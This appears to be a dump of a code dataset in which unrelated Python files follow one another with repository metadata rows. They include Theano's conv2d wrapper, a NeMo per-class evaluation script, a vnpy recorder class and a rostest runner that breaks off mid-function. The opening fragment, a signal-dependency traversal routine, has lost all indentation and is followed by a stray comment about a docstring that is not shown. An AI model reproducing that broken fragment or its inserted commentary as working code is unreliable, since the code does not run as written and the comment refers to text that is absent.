        # that already have been calculated. Further, reachableSignals shall also contain dependencies if they
# were not already calculated
if self._show_print > 0:
print("determine_execution_order on level " + str(self.level) )
# compute by traversing the tree
execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states = self.backwards_traverse_signals_exec__(start_signal=signal_to_calculate, depth_counter = 0, current_system=current_system)
# the iteration level
self.level = self.level + 1
return ExecutionLine( execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states )
def printExecutionLine(self):
pass
def reset_markers(self):
# reset graph traversion markers
for signal in self.marked_signals:
signal.graphTraversionMarkerReset()
# reset status variables
self.marked_signals = []
self.level = 0
def place_marker_for_current_level(self, signal):
# mark the node/signal as being visited (meaning computed)
signal.graphTraversionMarkerMarkVisited(self.level)
self.marked_signals.append(signal)
# NOTE: unused
def is_signal_already_computable(self, signal : Signal):
return signal.graphTraversionMarkerMarkIsVisited()
# Start backward traversion starting from the given startSignal
def backwards_traverse_signals_exec__(self, start_signal : Signal, depth_counter : int, current_system):
# WARNING: This is a recursive function!
# the list of signals to compute in correct order
execution_order = []
# list of signals the computation depends on (the tips of the execution tree)
dependency_signals = []
# the list of simulation input signals required for the computation
dependency_signals_simulation_inputs = []
        # For each signal in execution_order there might be a block that
# has an internal memory. It is required to build a list of those blocks
# that need a state update after their output(s) are calculated.
blocks_to_update_states = []
#
dependency_signals_through_states = []
#
# check if the datatype of startSignal is defined
#
if start_signal.datatype is None:
raise BaseException('Unknown datatype for signal ' + start_signal.name + ': no datatype has been specified or could be determined automatically.')
#
#
#
tabs = ''
for i in range(0, depth_counter):
tabs += '. '
if not (isinstance(start_signal, SimulationInputSignal) or isinstance(start_signal, BlockOutputSignal)):
# this case must be an error..
raise BaseException('not implemented or internal error: unexpected type of signal ' + start_signal.name)
# check if the signal is a system input signal
is_crossing_simulation_border = start_signal.is_crossing_system_boundary(current_system) # self.system != startSignal.sim
# TODO: IMPLEMENT: except when startSignal is a simulation input (in this case it is not computed)
# and not isinstance(startSignal, SimulationInputSignal)
if start_signal.graphTraversionMarkerMarkIsVisitedOnLevelLowerThan(self.level):
# - a previously computed signal has been reached
if self._show_print > 1:
print(Style.DIM + tabs + "has already been calculated in a previous traversion")
dependency_signals.append( start_signal )
# in case startSignal is a simulation input, still add it to the list of simulation input dependencies
# though it has already been computed
if is_crossing_simulation_border:
if self._show_print > 1:
print(Style.DIM + tabs + "as it is also a simulation input, adding it to the list of depended inputs")
# also note down that this is a (actually used) simulation input
dependency_signals_simulation_inputs.append( start_signal )
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
if start_signal.graphTraversionMarkerMarkIsVisited():
if self._show_print > 1:
print(Style.DIM + tabs + "has already been calculated in this traversion")
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
if is_crossing_simulation_border:
# signal is an input to the system
# add to the list of dependent inputs
if self._show_print > 1:
print(Fore.YELLOW + tabs + " --> crosses system bounds")
# startSignal is at the top of the tree, so add it to the dependencies
dependency_signals.append( start_signal )
# also note down that this is a (actually used) simulation input
dependency_signals_simulation_inputs.append( start_signal )
if self._show_print > 1:
print(Style.DIM + tabs + "added input dependency " + start_signal.toStr())
# mark the node/signal as being visited (meaning computed)
self.place_marker_for_current_level(start_signal)
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
# get the blocks prototype function to calculate startSignal
block = start_signal.getSourceBlock()
blocksPrototype = block.getBlockPrototype()
#
# check if the block that yields startSignal uses internal-states to compute startSignal
#
inputs_to_update_states_tmp = blocksPrototype.config_request_define_state_update_input_dependencies( start_signal )
if inputs_to_update_states_tmp is not None:
if self._show_print > 1:
print(tabs + "--- signals needed *indirectly* to compute " + start_signal.name + " (through state update) --" )
#
blocks_to_update_states.append( block )
# please note: blocksPrototype.config_request_define_state_update_input_dependencies might return some undetermined signals that are resolved here
resolveUndeterminedSignals( inputs_to_update_states_tmp )
# add the signals that are required to perform the state update
dependency_signals_through_states.extend( inputs_to_update_states_tmp )
if self._show_print > 1:
for signal in inputs_to_update_states_tmp:
print(Fore.MAGENTA + tabs + "-> S " + signal.name )
#
# find out the links to other signals but only these ones that are
# needed to calculate 'startSignal'
#
if self._show_print > 1:
print(tabs + "--- signals needed for " + start_signal.name + " --" )
dependingSignals = blocksPrototype.config_request_define_feedforward_input_dependencies(start_signal)
# please note: blocksPrototype.config_request_define_feedforward_input_dependencies might return some undetermined signals that are resolved here
resolveUndeterminedSignals( dependingSignals )
if len(dependingSignals) == 0:
# no dependencies to calculate startSignal (e.g. in case of const blocks or blocks without direct feedthrough)
if self._show_print > 1:
print(Style.DIM + tabs + " (no signals needed) " )
# block startSignal.getSourceBlock() --> startSignal is a starting point
# startSignal is at the top of the tree, so add it to the dependencies
dependency_signals.append( start_signal )
#
if self._show_print > 1:
print(Style.DIM + tabs + "added " + start_signal.toStr())
execution_order.append( start_signal )
# mark the node/signal as being visited (meaning computed)
self.place_marker_for_current_level(start_signal)
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
#
# ITERATE: go through all signals needed to calculate startSignal
# only in case there are any, we come to this point
#
for signal in dependingSignals:
if self._show_print > 1:
print(Fore.MAGENTA + tabs + "-> S " + signal.name )
if depth_counter > 100:
                raise BaseException('maximum number of iterations reached in system ' + signal.system.name + ', signal ' + signal.name)
# R E C U R S I O N
A_execution_order, A_dependency_signals, A_dependency_signals_simulation_inputs, A_blocks_to_update_states, A_dependency_signals_through_states = self.backwards_traverse_signals_exec__( signal, depth_counter = depth_counter + 1, current_system=current_system )
execution_order.extend( A_execution_order )
dependency_signals.extend( A_dependency_signals )
dependency_signals_simulation_inputs.extend( A_dependency_signals_simulation_inputs )
blocks_to_update_states.extend( A_blocks_to_update_states )
dependency_signals_through_states.extend( A_dependency_signals_through_states )
#
# FINALIZE: now also startSignal can be computed
#
#
# store startSignal as reachable (put it on the execution list)
# NOTE: if startSignal is the tip of the tree (no dependingSignals) it is excluded
# from this list. However, it is still in the list of dependencySignals.
#
if self._show_print > 1:
print(Style.DIM + tabs + "added " + start_signal.toStr())
execution_order.append( start_signal )
# mark the node/signal as being visited (meaning computed)
self.place_marker_for_current_level(start_signal)
return execution_order, dependency_signals, dependency_signals_simulation_inputs, blocks_to_update_states, dependency_signals_through_states
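The BuildExecutionPath docstring above describes a backward traversal that plans only the computations not already planned in earlier calls. A toy, self-contained illustration of that idea (not the OpenRTDynamics API) might look like this:

# Toy illustration: walk backwards through signal dependencies and emit a valid
# execution order, skipping signals that were already planned in an earlier call.
def determine_order(target, dependencies, already_planned):
    """dependencies maps a signal name to the signals it needs."""
    order = []

    def visit(signal):
        if signal in already_planned or signal in order:
            return
        for needed in dependencies.get(signal, []):
            visit(needed)
        order.append(signal)

    visit(target)
    already_planned.update(order)
    return order

deps = {"y": ["u1", "x"], "x": ["u2"]}     # y depends on u1 and x; x depends on u2
planned = set()
print(determine_order("y", deps, planned))  # ['u1', 'u2', 'x', 'y']
print(determine_order("x", deps, planned))  # [] -- already planned by the first call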
| 37.78777
| 272
| 0.652975
|
078805334a4dc09621d35922fbab569351058e34
| 6,266
|
py
|
Python
|
theano/tensor/nnet/__init__.py
|
bartvm/Theano
|
e088e2a8d81a27c98b2e80b1a05227700996e42d
|
[
"BSD-3-Clause"
] | null | null | null |
theano/tensor/nnet/__init__.py
|
bartvm/Theano
|
e088e2a8d81a27c98b2e80b1a05227700996e42d
|
[
"BSD-3-Clause"
] | null | null | null |
theano/tensor/nnet/__init__.py
|
bartvm/Theano
|
e088e2a8d81a27c98b2e80b1a05227700996e42d
|
[
"BSD-3-Clause"
] | null | null | null |
from .nnet import (
CrossentropyCategorical1Hot, CrossentropyCategorical1HotGrad,
CrossentropySoftmax1HotWithBiasDx, CrossentropySoftmaxArgmax1HotWithBias,
LogSoftmax, Prepend_scalar_constant_to_each_row,
Prepend_scalar_to_each_row, Softmax,
SoftmaxGrad, SoftmaxWithBias, binary_crossentropy,
categorical_crossentropy, crossentropy_categorical_1hot,
crossentropy_categorical_1hot_grad, crossentropy_softmax_1hot,
crossentropy_softmax_1hot_with_bias,
crossentropy_softmax_1hot_with_bias_dx,
crossentropy_softmax_argmax_1hot_with_bias,
crossentropy_softmax_max_and_argmax_1hot,
crossentropy_softmax_max_and_argmax_1hot_with_bias,
crossentropy_to_crossentropy_with_softmax,
crossentropy_to_crossentropy_with_softmax_with_bias,
graph_merge_softmax_with_crossentropy_softmax, h_softmax,
logsoftmax, logsoftmax_op, prepend_0_to_each_row, prepend_1_to_each_row,
prepend_scalar_to_each_row, relu, softmax, softmax_grad, softmax_graph,
softmax_op, softmax_simplifier, softmax_with_bias, elu)
from . import opt
from .conv import ConvOp
from .Conv3D import *
from .ConvGrad3D import *
from .ConvTransp3D import *
from .sigm import (softplus, sigmoid, sigmoid_inplace,
scalar_sigmoid, ultra_fast_sigmoid,
hard_sigmoid)
from .bn import batch_normalization
import warnings
from .abstract_conv import conv2d as abstract_conv2d
def conv2d(input, filters, input_shape=None, filter_shape=None,
border_mode='valid', subsample=(1, 1), filter_flip=True,
image_shape=None, **kwargs):
"""
This function will build the symbolic graph for convolving a mini-batch of a
stack of 2D inputs with a set of 2D filters. The implementation is modelled
after Convolutional Neural Networks (CNN).
Parameters
----------
input: symbolic 4D tensor
Mini-batch of feature map stacks, of shape
(batch size, input channels, input rows, input columns).
See the optional parameter ``input_shape``.
filters: symbolic 4D tensor
Set of filters used in CNN layer of shape
(output channels, input channels, filter rows, filter columns).
See the optional parameter ``filter_shape``.
input_shape: None, tuple/list of len 4 of int or Constant variable
The shape of the input parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
filter_shape: None, tuple/list of len 4 of int or Constant variable
The shape of the filters parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
border_mode: str, int or tuple of two int
Either of the following:
``'valid'``: apply filter wherever it completely overlaps with the
input. Generates output of shape: input shape - filter shape + 1
``'full'``: apply filter wherever it partly overlaps with the input.
Generates output of shape: input shape + filter shape - 1
``'half'``: pad input with a symmetric border of ``filter rows // 2``
rows and ``filter columns // 2`` columns, then perform a valid
convolution. For filters with an odd number of rows and columns, this
leads to the output shape being equal to the input shape.
``int``: pad input with a symmetric border of zeros of the given
width, then perform a valid convolution.
``(int1, int2)``: pad input with a symmetric border of ``int1`` rows
and ``int2`` columns, then perform a valid convolution.
subsample: tuple of len 2
Factor by which to subsample the output.
Also called strides elsewhere.
filter_flip: bool
If ``True``, will flip the filter rows and columns
before sliding them over the input. This operation is normally referred
to as a convolution, and this is the default. If ``False``, the filters
are not flipped and the operation is referred to as a cross-correlation.
image_shape: None, tuple/list of len 4 of int or Constant variable
Deprecated alias for input_shape.
kwargs: Any other keyword arguments are accepted for backwards
compatibility, but will be ignored.
Returns
-------
Symbolic 4D tensor
Set of feature maps generated by convolutional layer. Tensor is
of shape (batch size, output channels, output rows, output columns)
Notes
-----
    If cuDNN is available, it will be used on the
    GPU. Otherwise, the *CorrMM* convolution ("caffe-style convolution")
    will be used.
This is only supported in Theano 0.8 or the development
version until it is released.
"""
if 'imshp_logical' in kwargs or 'kshp_logical' in kwargs:
raise ValueError(
"Keyword arguments 'imshp_logical' and 'kshp_logical' for conv2d "
"are not supported anymore (and have not been a reliable way to "
"perform upsampling). That feature is still available by calling "
"theano.tensor.nnet.conv.conv2d() for the time being.")
if len(kwargs.keys()) > 0:
warnings.warn(str(kwargs.keys()) +
" are now deprecated in "
"`tensor.nnet.abstract_conv.conv2d` interface"
" and will be ignored.",
stacklevel=2)
if image_shape is not None:
warnings.warn("The `image_shape` keyword argument to "
"`tensor.nnet.conv2d` is deprecated, it has been "
"renamed to `input_shape`.",
stacklevel=2)
if input_shape is None:
input_shape = image_shape
else:
raise ValueError("input_shape and image_shape should not"
" be provided at the same time.")
return abstract_conv2d(input, filters, input_shape, filter_shape,
border_mode, subsample, filter_flip)
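The border_mode rules quoted in the docstring can be checked with a few lines of plain Python (no Theano import needed); the helper below is only an arithmetic illustration, not part of the library.

def conv2d_output_rows(input_rows, filter_rows, border_mode, stride=1):
    if border_mode == 'valid':
        full_rows = input_rows - filter_rows + 1
    elif border_mode == 'full':
        full_rows = input_rows + filter_rows - 1
    elif border_mode == 'half':
        full_rows = input_rows + 2 * (filter_rows // 2) - filter_rows + 1
    else:                       # integer padding on both sides
        full_rows = input_rows + 2 * border_mode - filter_rows + 1
    # subsampling keeps every `stride`-th row of the non-strided output
    return (full_rows + stride - 1) // stride

print(conv2d_output_rows(32, 5, 'valid'))   # 28
print(conv2d_output_rows(32, 5, 'full'))    # 36
print(conv2d_output_rows(32, 5, 'half'))    # 32 (odd filter size keeps the input size)
print(conv2d_output_rows(32, 5, 2))         # 32 + 4 - 5 + 1 = 32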
| 43.513889
| 81
| 0.680179
|
2ff691a15bfcbcf3f669388ce76d0adbe069de40
| 431
|
py
|
Python
|
data/scripts/templates/object/mobile/shared_forest_murra.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/mobile/shared_forest_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/mobile/shared_forest_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_forest_murra.iff"
result.attribute_template_id = 9
result.stfName("monster_name","murra")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 25.352941
| 58
| 0.721578
|
7934df9d7242729576f9def8fe0b5b369d84387d
| 173
|
py
|
Python
|
vnpy_pro/app/data_recorder/__init__.py
|
caizhanjin/vnpy
|
c0886dbd8eba7f506634b1700dfd09b0b098ef26
|
[
"MIT"
] | 5
|
2020-09-13T05:07:38.000Z
|
2020-12-26T15:10:00.000Z
|
vnpy_pro/app/data_recorder/__init__.py
|
caizhanjin/vnpy
|
c0886dbd8eba7f506634b1700dfd09b0b098ef26
|
[
"MIT"
] | null | null | null |
vnpy_pro/app/data_recorder/__init__.py
|
caizhanjin/vnpy
|
c0886dbd8eba7f506634b1700dfd09b0b098ef26
|
[
"MIT"
] | 2
|
2020-06-03T06:40:31.000Z
|
2020-06-12T14:55:17.000Z
|
from vnpy.app.data_recorder import DataRecorderApp
from .engine import RecorderEnginePro
class DataRecorderAppPro(DataRecorderApp):
engine_class = RecorderEnginePro
| 19.222222
| 50
| 0.83815
|
1ed55ecac948fb03cae35935bf29747fabc14617
| 5,987
|
py
|
Python
|
examples/nlp/text_normalization_as_tagging/evaluation/eval_per_class.py
|
gkucsko/NeMo
|
c1ae0a7744d9a0ac206f61b2883ce00c9b8339b9
|
[
"Apache-2.0"
] | null | null | null |
examples/nlp/text_normalization_as_tagging/evaluation/eval_per_class.py
|
gkucsko/NeMo
|
c1ae0a7744d9a0ac206f61b2883ce00c9b8339b9
|
[
"Apache-2.0"
] | 1
|
2022-03-06T14:09:02.000Z
|
2022-03-06T14:09:02.000Z
|
examples/nlp/text_normalization_as_tagging/evaluation/eval_per_class.py
|
gkucsko/NeMo
|
c1ae0a7744d9a0ac206f61b2883ce00c9b8339b9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2022, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script can be used to compare the inference output of Thutmose tagger with multi_reference file.
The additional report is stored to a separate file for each semiotic class.
USAGE Example:
python eval_per_class.py \
--inference_file= \
--reference_file= \
--output_file=
The inference file is a tsv file in which the first column contains the predicted sentence text.
The reference file is a tsv file in which
the first column contains the input sentence text,
the second column contains the reference sentence text (taken from Google TN dataset)
the third column (optional) contains additional acceptable references for semiotic spans in this sentence.
E.g.
mizoguchi akiko september twenty ten mizoguchi akiko september 2010 DATE 2 5 | sept 2010 | sep. 2010 ...
The script generates:
a file with a report on accuracy per semiotic class (output_file).
files (<output_file>.<semiotic_class>) with sentences, containing errors in this semiotic span.
"""
import glob
import os
from argparse import ArgumentParser
from collections import Counter
parser = ArgumentParser(description="Compare inference output with multi-reference, print report per class")
parser.add_argument("--inference_file", type=str, required=True, help="Path to inference file 1")
parser.add_argument("--reference_file", type=str, required=True, help="Path to reference file")
parser.add_argument("--output_file", type=str, required=True, help="Path to output file")
args = parser.parse_args()
# Main code
if __name__ == '__main__':
# delete all class-specific reports, as they are created in the append mode
for f in glob.glob(args.output_file + ".*"):
os.remove(f)
total_count = Counter()
correct_count = Counter()
f_ref = open(args.reference_file, "r", encoding="utf-8")
f_infer = open(args.inference_file, "r", encoding="utf-8")
f_out = open(args.output_file, "w", encoding="utf-8")
lines_ref = f_ref.readlines()
lines_infer = f_infer.readlines()
f_ref.close()
f_infer.close()
if len(lines_ref) != len(lines_infer):
raise ValueError(
"Number of lines doesn't match: len(lines_ref)="
+ str(len(lines_ref))
+ "; len(lines_infer)="
+ str(len(lines_infer))
)
for i in range(len(lines_infer)):
_, inp_str, _, tag_with_swap_str, semiotic = lines_infer[i].strip().split("\t")
input_words = inp_str.split(" ")
predicted_tags = tag_with_swap_str.split(" ")
predicted_words = predicted_tags[:]
for k in range(len(predicted_tags)):
t = predicted_tags[k]
if t == "<SELF>":
predicted_words[k] = input_words[k]
elif t == "<DELETE>":
predicted_words[k] = ""
else:
predicted_words[k] = predicted_words[k].replace(">", "").replace("<", "")
parts = lines_ref[i].strip().split("\t")
if len(parts) < 2 or len(parts) > 3:
raise ValueError("Bad format: " + lines_ref[i])
if len(parts) == 3: # there are non-trivial semiotic spans
spans = parts[2].split(";")
for span in spans:
span_parts = span.split(" | ")
try:
sem, begin, end = span_parts[0].split(" ")
except Exception:
print("error: ", lines_ref[i])
continue
begin = int(begin)
end = int(end)
ok = False
predicted_span = " ".join(predicted_words[begin:end]).replace("_", " ").replace(" ", "").casefold()
input_span = " ".join(input_words[begin:end])
total_count[sem] += 1
for tr_variant in span_parts[1:]:
ref_span = tr_variant.replace("_", " ").replace(" ", "").casefold()
if ref_span == predicted_span:
ok = True
correct_count[sem] += 1
break
if not ok:
out_sem = open(args.output_file + "." + sem, "a", encoding="utf-8")
out_sem.write(
"error: pred="
+ " ".join(predicted_words[begin:end])
+ "; inp="
+ input_span
+ "; ref="
+ span
+ "\n"
)
out_sem.write("\tinput=" + " ".join(input_words) + "\n")
out_sem.write("\ttags=" + " ".join(predicted_tags) + "\n")
out_sem.write("\tpred=" + " ".join(predicted_words) + "\n")
out_sem.write("\tsemiotic=" + semiotic + "\n")
out_sem.write("\tref=" + parts[1] + "\n")
out_sem.close()
f_out.write("class\ttotal\tcorrect\terrors\taccuracy\n")
for sem in total_count:
f_out.write(
sem
+ "\t"
+ str(total_count[sem])
+ "\t"
+ str(correct_count[sem])
+ "\t"
+ str(total_count[sem] - correct_count[sem])
+ "\t"
+ str(correct_count[sem] / total_count[sem])
+ "\n"
)
f_out.close()
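A small sketch of how one multi-reference line in the format described by the docstring is interpreted; the sentence is taken from the docstring's own example and the extra reference variants are invented.

# Example line in the reference-file format described above: column 3 holds
# ';'-separated semiotic spans, each written as "CLASS begin end | ref1 | ref2 ...".
ref_line = (
    "mizoguchi akiko september twenty ten\t"
    "mizoguchi akiko september 2010\t"
    "DATE 2 5 | september 2010 | sept 2010 | sep. 2010"
)

inp, ref, spans_col = ref_line.split("\t")
for span in spans_col.split(";"):
    span_parts = span.split(" | ")
    sem, begin, end = span_parts[0].split(" ")
    accepted = span_parts[1:]
    print(sem, inp.split(" ")[int(begin):int(end)], "->", accepted)
    # DATE ['september', 'twenty', 'ten'] -> ['september 2010', 'sept 2010', 'sep. 2010']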
| 41.006849
| 119
| 0.574745
|
662169b81621bb0829d61cce2994cf0ec19718e9
| 368
|
py
|
Python
|
Programming-Basics-with-Python-April-2019/07_conditional_statements_more_exercises/05_firm.py
|
marinakolova/Python-Courses
|
eb95c782307be561b5026c5adafaa001b04caf4f
|
[
"MIT"
] | null | null | null |
Programming-Basics-with-Python-April-2019/07_conditional_statements_more_exercises/05_firm.py
|
marinakolova/Python-Courses
|
eb95c782307be561b5026c5adafaa001b04caf4f
|
[
"MIT"
] | null | null | null |
Programming-Basics-with-Python-April-2019/07_conditional_statements_more_exercises/05_firm.py
|
marinakolova/Python-Courses
|
eb95c782307be561b5026c5adafaa001b04caf4f
|
[
"MIT"
] | null | null | null |
import math
hours_needed = int(input())
days = int(input())
overtime_workers = int(input())
hours_worked = days * 0.9 * 8
hours_worked += (overtime_workers * 2 * days)
if hours_worked >= hours_needed:
print(f"Yes!{math.floor(hours_worked) - hours_needed} hours left.")
else:
print(f"Not enough time!{hours_needed - math.floor(hours_worked)} hours needed.")
| 26.285714
| 85
| 0.711957
|
34c0603e0b5a89d64a71152434b12453ed7c0aee
| 323
|
py
|
Python
|
use/python/log_handle/examples/src_cfg_log.py
|
MuggleWei/Hakuna_Matata
|
6a3a012dc2a5942599098d94e90e9381d660500d
|
[
"WTFPL"
] | null | null | null |
use/python/log_handle/examples/src_cfg_log.py
|
MuggleWei/Hakuna_Matata
|
6a3a012dc2a5942599098d94e90e9381d660500d
|
[
"WTFPL"
] | 30
|
2020-03-04T21:59:09.000Z
|
2022-01-04T16:46:52.000Z
|
use/python/log_handle/examples/src_cfg_log.py
|
MuggleWei/Hakuna_Matata
|
6a3a012dc2a5942599098d94e90e9381d660500d
|
[
"WTFPL"
] | null | null | null |
import logging
from log_handle import LogHandle
if __name__ == "__main__":
LogHandle.init_log(filename="logs/output.log", use_rotate=True)
logging.debug("debug message")
logging.info("info message")
logging.warning("warning message")
logging.error("error message")
logging.fatal("fatal message")
| 24.846154
| 67
| 0.724458
|
b2088699d1cb9127cee7d5b6814fa68eacbbee04
| 1,290
|
py
|
Python
|
tests/test_utils.py
|
qiskit-community/repo-monitor
|
b777f64b340e1bf46be017a80c5c6e521f466e5d
|
[
"Apache-2.0"
] | 9
|
2021-08-06T14:33:06.000Z
|
2022-01-01T04:00:39.000Z
|
tests/test_utils.py
|
qiskit-community/repo-monitor
|
b777f64b340e1bf46be017a80c5c6e521f466e5d
|
[
"Apache-2.0"
] | 2
|
2021-08-04T18:52:31.000Z
|
2021-10-01T20:57:25.000Z
|
tests/test_utils.py
|
qiskit-community/repo-monitor
|
b777f64b340e1bf46be017a80c5c6e521f466e5d
|
[
"Apache-2.0"
] | 4
|
2021-08-12T06:49:30.000Z
|
2022-02-08T20:19:34.000Z
|
"""Tests for utils."""
import unittest
from typing import Optional, Union
from monitor.utils import UrlsHelper, GitHubUrlsHelper
class MockUrlsHelper(UrlsHelper):
"""Mock urls helpder for testing purposes."""
def get_comments_url(self, account: str, repo: str,
number: Union[str, int]) -> str:
"""Returns mock comments url."""
return "http://localhost/comments"
def get_issues_url(self, account: str, repo: str,
page: Optional[Union[str, int]] = None) -> str:
"""Returns mock issues url."""
return "http://localhost/issues"
class TestUrlHelper(unittest.TestCase):
"""Tests url helpers."""
    def test_github_url_helper(self):
        """Tests github url helper."""
helper = GitHubUrlsHelper()
issues_api_url = "https://api.github.com/repos/Qiskit/qiskit-terra/" \
"issues?page=10&state=open&per_page=100"
comments_api_url = "https://api.github.com/repos/Qiskit/qiskit-terra/" \
"issues/1234/comments?per_page=100"
self.assertEqual(helper.get_issues_url("Qiskit", "qiskit-terra", 10), issues_api_url)
self.assertEqual(helper.get_comments_url("Qiskit", "qiskit-terra", 1234), comments_api_url)
| 36.857143
| 99
| 0.634884
|
3ac5c76f5e2524e281652dabbac7e557c65b9b98
| 295
|
py
|
Python
|
poster/streaminghttp/__init__.py
|
EvanDarwin/poster
|
88e0149cce746d4fe8781da45ca6e0d772356237
|
[
"MIT"
] | null | null | null |
poster/streaminghttp/__init__.py
|
EvanDarwin/poster
|
88e0149cce746d4fe8781da45ca6e0d772356237
|
[
"MIT"
] | 2
|
2016-06-15T18:46:47.000Z
|
2016-06-16T00:40:18.000Z
|
poster/streaminghttp/__init__.py
|
EvanDarwin/poster
|
88e0149cce746d4fe8781da45ca6e0d772356237
|
[
"MIT"
] | 1
|
2021-06-22T10:03:32.000Z
|
2021-06-22T10:03:32.000Z
|
def register_openers():
"""
DEPRECATED - This function will be removed in version 1.0.0
This function is now a placeholder for backwards compatibility
"""
class DummyOpener(object):
def add_handler(self, *args, **kwargs):
pass
return DummyOpener()
| 22.692308
| 66
| 0.647458
|
8d9a52c4fa148539c5eaa922ae3577a237cbb763
| 9,800
|
py
|
Python
|
third_party/legacy_rostest/runner.py
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 14
|
2021-05-02T00:58:45.000Z
|
2022-01-11T07:01:27.000Z
|
third_party/legacy_rostest/runner.py
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | null | null | null |
third_party/legacy_rostest/runner.py
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 1
|
2022-02-07T00:17:23.000Z
|
2022-02-07T00:17:23.000Z
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# pylint: disable=invalid-name,consider-using-f-string,global-statement,global-variable-not-assigned,unused-argument
# pylint: disable=line-too-long
import os
import sys
import logging
import unittest
import rospkg
import rosunit.junitxml
import third_party.legacy_roslaunch as roslaunch
from third_party.legacy_rostest.rostestutil import printlog, printlogerr
from third_party.legacy_rostest.rostest_parent import ROSTestLaunchParent
# NOTE: ignoring Python style guide as unittest is sadly written with Java-like camel casing
_results = rosunit.junitxml.Result('rostest', 0, 0, 0)
def _accumulateResults(results):
_results.accumulate(results)
def getResults():
return _results
_textMode = False
def setTextMode(val):
global _textMode
_textMode = val
# global store of all ROSLaunchRunners so we can do an extra shutdown
# in the rare event a tearDown fails to execute
_test_parents = []
_config = None
def _addRostestParent(runner):
global _test_parents, _config
logging.getLogger('rostest').info("_addRostestParent [%s]", runner)
_test_parents.append(runner)
_config = runner.config
def getConfig():
return _config
def getRostestParents():
return _test_parents
# TODO: convert most of this into a run() routine of a RoslaunchRunner subclass
## generate test failure if tests with same name in launch file
def failDuplicateRunner(testName):
def fn(self):
print("Duplicate tests named [%s] in rostest suite" % testName)
self.fail("Duplicate tests named [%s] in rostest suite" % testName)
return fn
def failRunner(testName, message):
def fn(self):
print(message, file=sys.stderr)
self.fail(message)
return fn
def rostestRunner(test, results_base_dir=None):
"""
Test function generator that takes in a roslaunch Test object and
returns a class instance method that runs the test. TestCase
setUp() is responsible for ensuring that the rest of the roslaunch
state is correct and tearDown() is responsible for tearing
everything down cleanly.
@param test: rost test to run
@type test: roslaunch.Test
@return: function object to run testObj
@rtype: fn
"""
## test case pass/fail is a measure of whether or not the test ran
def fn(self):
done = False
while not done:
self.assert_(self.test_parent is not None,
"ROSTestParent initialization failed")
test_name = test.test_name
printlog("Running test [%s]", test_name)
#launch the other nodes
_, failed = self.test_parent.launch()
self.assert_(not failed,
"Test Fixture Nodes %s failed to launch" % failed)
#setup the test
test_file = os.path.join(rospkg.get_test_results_dir(),
"{}.xml".format(test_name))
# TODO: have to redeclare this due to a bug -- this file
# needs to be renamed as it aliases the module where the
# constant is elsewhere defined. The fix is to rename
# rostest.py
